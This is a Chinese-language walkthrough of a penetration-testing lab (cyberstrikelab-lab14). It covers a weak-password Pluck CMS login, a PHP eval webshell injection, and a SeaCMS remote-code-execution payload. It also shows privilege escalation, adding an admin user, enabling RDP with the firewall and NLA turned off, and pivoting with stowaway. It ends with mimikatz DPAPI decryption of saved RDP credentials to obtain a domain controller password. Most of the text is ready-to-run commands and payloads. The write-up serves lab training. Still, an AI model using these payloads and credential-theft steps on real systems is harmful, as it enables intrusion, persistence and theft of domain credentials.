当前位置: 首页 > news >正文

cyberstrikelab-lab14

flag1 pluck

后台弱密码 cslab

第一次打的时候任意文件上传上传不上去,怀疑是没配置好 temp 目录的权限,这里用另一个漏洞

先把报错的 album 模块删掉

抓包修改 cont2

cont2=';eval($_POST[x]);//

蚁剑连接 http://10.0.0.34/admin.php?module=blog

可以直接拿到 flag

tasklist 发现有 defender 用掩日分离上线 msf

assets/cyberstrikelab-lab14/image-20250929233226828.png

getsystem 提权

assets/cyberstrikelab-lab14/image-20250929233846569.png

shell 里添加用户

net user admin admin@123 /add

添加到管理员组

net localgroup Administrators mysql /add

开启 3389

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭防火墙

netsh advfirewall set allprofiles state off

关闭身份验证

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

3389 连接发现有双网卡,使用 stowaway 内网穿透

攻击机

windows_x64_admin.exe -c 10.0.0.34:6666

靶机

windows_x64_agent.exe -l 6666

flag2 seacms

fscan 扫出 seacms 漏洞

[+] PocScan http://10.5.8.88 poc-yaml-seacms-sqli
[+] PocScan http://10.5.8.88 poc-yaml-seacms-v654-rce

参考

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=({searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[x]))&x=system('whoami');

assets/cyberstrikelab-lab14/image-20250929235443464.png

system 权限,直接开 3389 上线

flag3 DC

在第二台机器中发现 rdp 凭据

dir /a C:\Users\Administrator\appdata\local\microsoft\credentials\*

使用 mimikatz 解密 rdp 凭据

记录文件名

assets/cyberstrikelab-lab14/image-20251002123604410.png

811292CB3B95926F7EA2D46FEB2A7ADB

找 guidMasterKey

mimikatz.exe "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\811292CB3B95926F7EA2D46FEB2A7ADB" "exit"

assets/cyberstrikelab-lab14/image-20250930001343134.png

{2e550db8-ab33-407c-8a29-120d38c9d711}

找到对应 guidMasterKey 对应的 masterkey

mimikatz.exe "privilege::debug" "sekurlsa::dpapi" "exit"

assets/cyberstrikelab-lab14/image-20250930001429218.png

24b089facc24b9f698931a52411c777ed146efe5f0248fd0d4b1844f1d441b9970ad86c006627e49b0e8c94179f0b4a8f509f9d8af5af3569faa21d9c56068a9

解密

mimikatz.exe "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\811292CB3B95926F7EA2D46FEB2A7ADB /masterkey:24b089facc24b9f698931a52411c777ed146efe5f0248fd0d4b1844f1d441b9970ad86c006627e49b0e8c94179f0b4a8f509f9d8af5af3569faa21d9c56068a9" "exit"

assets/cyberstrikelab-lab14/image-20250930001529749.png

得到 DC 密码 cs1ab@qs

3389 连接即可

http://www.hskmm.com/?act=detail&tid=22879

相关文章:

  • 使用虚幻引擎(UE5)制作开箱爆金币功能 - 详解
  • 2025 年自动喷砂机厂家 TOP 企业品牌推荐排行榜,从生产规模到技术创新,自动喷砂机推荐这十家公司!
  • 2025年光亮剂源头厂家最新推荐榜单:聚焦实力厂商,为电镀企业精选高口碑品牌
  • 深入解析:[linux仓库]深入解析Linux动态链接与动态库加载:理解背后的原理与技巧
  • AI行业应用:金融、医疗、教育、制造业的落地实践与技术创新 - 实践
  • 红色面纱
  • 创建 SQL Server 数据库
  • 2025上海殡葬一条龙服务优质推荐:福孝堂文化用品公司贴心之
  • 2025上海寿衣厂家推荐福孝堂,专注传统工艺与贴心服务
  • 2025上海骨灰盒厂家推荐,福孝堂专业定制与暖心服务口碑之选
  • 【Groovy】函数、闭包、泛型
  • 关于onnxruntime依赖报错问题
  • 深度学习(Grad-CAM)
  • 论文选读
  • C++设计模式之行为型模式:职责链模式(Chain of Responsibility) - 实践
  • 第一章作业
  • 数据库系统概论
  • Pytorch
  • 页面 HTTPS 化实战,从证书部署到真机验证的全流程(证书链、重定向、混合内容、抓包排查) - 实践
  • AT_abc308_h [ABC308Ex] Make Q
  • 函数-高级用法+闭包
  • 点云-标注-分类-航线规划软件 (一)点云自动分类 - 实践
  • JVM的内存分配策略有哪些?
  • 在Linux系统上一键配置DoH,解决DNS解析被污染
  • 《电路基础》第五章学习笔记
  • Elasticsearch集群监控信息(亲测) - 教程
  • 2025超声波清洗机厂家TOP企业品牌推荐排行榜,龙门式,悬挂式,全自动,多臂式,多槽式,履带式,通过式,单槽式,摆动式,平移式超声波清洗机公司推荐!
  • SQL:concat函数(连接字符串)
  • 2025 北京地下室防潮品牌最新推荐排行榜:TOP3 实力品牌出炉,精准解决地下空间潮湿难题
  • python脚本统计fastq数据的GC含量